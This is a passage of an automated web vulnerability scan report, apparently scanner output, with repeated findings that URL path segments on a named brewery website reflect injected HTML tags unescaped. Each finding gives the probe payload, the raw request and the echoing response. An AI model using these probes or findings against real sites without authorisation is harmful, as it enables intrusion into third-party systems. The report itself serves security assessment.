Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finderf4b6f"><a>5c83f0838cb_page" class="beer_finderf4b6f">
...[SNIP]...

1.6. http://www.ninkasibrewing.com/beer_finder/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e44"><a>7d1f97cbdd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder85e44"><a>7d1f97cbdd2/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder85e44"><a>7d1f97cbdd2_page" class="beer_finder85e44">
...[SNIP]...

1.7. http://www.ninkasibrewing.com/beer_finder/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392d4"><a>7acca5121c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder392d4"><a>7acca5121c2/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder392d4"><a>7acca5121c2_page" class="beer_finder392d4">
...[SNIP]...

1.8. http://www.ninkasibrewing.com/beers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d2"><a>16a8c03f2fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers4e8d2"><a>16a8c03f2fd/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/playbook/?intcid=gnav

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Set-Cookie: PHPSESSID=rl6vcsjo3iil8biltj6mc4n0r2; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers4e8d2"><a>16a8c03f2fd_page" class="beers4e8d2">
...[SNIP]...

1.9. http://www.ninkasibrewing.com/beers/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41638"><a>88fb649091c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers41638"><a>88fb649091c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers41638"><a>88fb649091c_page" class="beers41638">
...[SNIP]...

1.10. http://www.ninkasibrewing.com/beers/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132d9"><a>11e6d305782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers132d9"><a>11e6d305782/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers132d9"><a>11e6d305782_page" class="beers132d9">
...[SNIP]...

1.11. http://www.ninkasibrewing.com/beers/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0387"><a>286a56ca007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersf0387"><a>286a56ca007/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beersf0387"><a>286a56ca007_page" class="beersf0387">
...[SNIP]...

1.12. http://www.ninkasibrewing.com/beers/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad3"><a>57b154d7fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3dad3"><a>57b154d7fd1/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers3dad3"><a>57b154d7fd1_page" class="beers3dad3">
...[SNIP]...

1.13. http://www.ninkasibrewing.com/beers/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed707"><a>9aff3285dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersed707"><a>9aff3285dbf/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beersed707"><a>9aff3285dbf_page" class="beersed707">
...[SNIP]...

1.14. http://www.ninkasibrewing.com/beers/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337e"><a>bf74ccda1f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3337e"><a>bf74ccda1f5/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers3337e"><a>bf74ccda1f5_page" class="beers3337e">
...[SNIP]...

1.15. http://www.ninkasibrewing.com/brewery/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72af8"><a>8c4153079a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery72af8"><a>8c4153079a4/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery72af8"><a>8c4153079a4_page" class="brewery72af8">
...[SNIP]...

1.16. http://www.ninkasibrewing.com/brewery/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef1f"><a>2fabca1655f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery6ef1f"><a>2fabca1655f/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery6ef1f"><a>2fabca1655f_page" class="brewery6ef1f">
...[SNIP]...

1.17. http://www.ninkasibrewing.com/brewery/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf8b"><a>2b307023ca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewerycaf8b"><a>2b307023ca2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewerycaf8b"><a>2b307023ca2_page" class="brewerycaf8b">
...[SNIP]...

1.18. http://www.ninkasibrewing.com/brewery/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c630"><a>4b43cdb9ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery2c630"><a>4b43cdb9ffe/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery2c630"><a>4b43cdb9ffe_page" class="brewery2c630">
...[SNIP]...

1.19. http://www.ninkasibrewing.com/brewery/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd1a"><a>7a2e695ff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery8bd1a"><a>7a2e695ff2/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery8bd1a"><a>7a2e695ff2_page" class="brewery8bd1a">
...[SNIP]...

1.20. http://www.ninkasibrewing.com/brewery/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fa0"><a>dd60fcefdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery78fa0"><a>dd60fcefdd7/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery78fa0"><a>dd60fcefdd7_page" class="brewery78fa0">
...[SNIP]...

1.21. http://www.ninkasibrewing.com/brewery/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a328"><a>58cb21c931b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery1a328"><a>58cb21c931b/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery1a328"><a>58cb21c931b_page" class="brewery1a328">
...[SNIP]...

1.22. http://www.ninkasibrewing.com/careers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebf4"><a>6ff175caf2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbebf4"><a>6ff175caf2b/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersbebf4"><a>6ff175caf2b_page" class="careersbebf4">
...[SNIP]...

1.23. http://www.ninkasibrewing.com/careers/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload becda"><a>fd1c2df5815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbecda"><a>fd1c2df5815/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

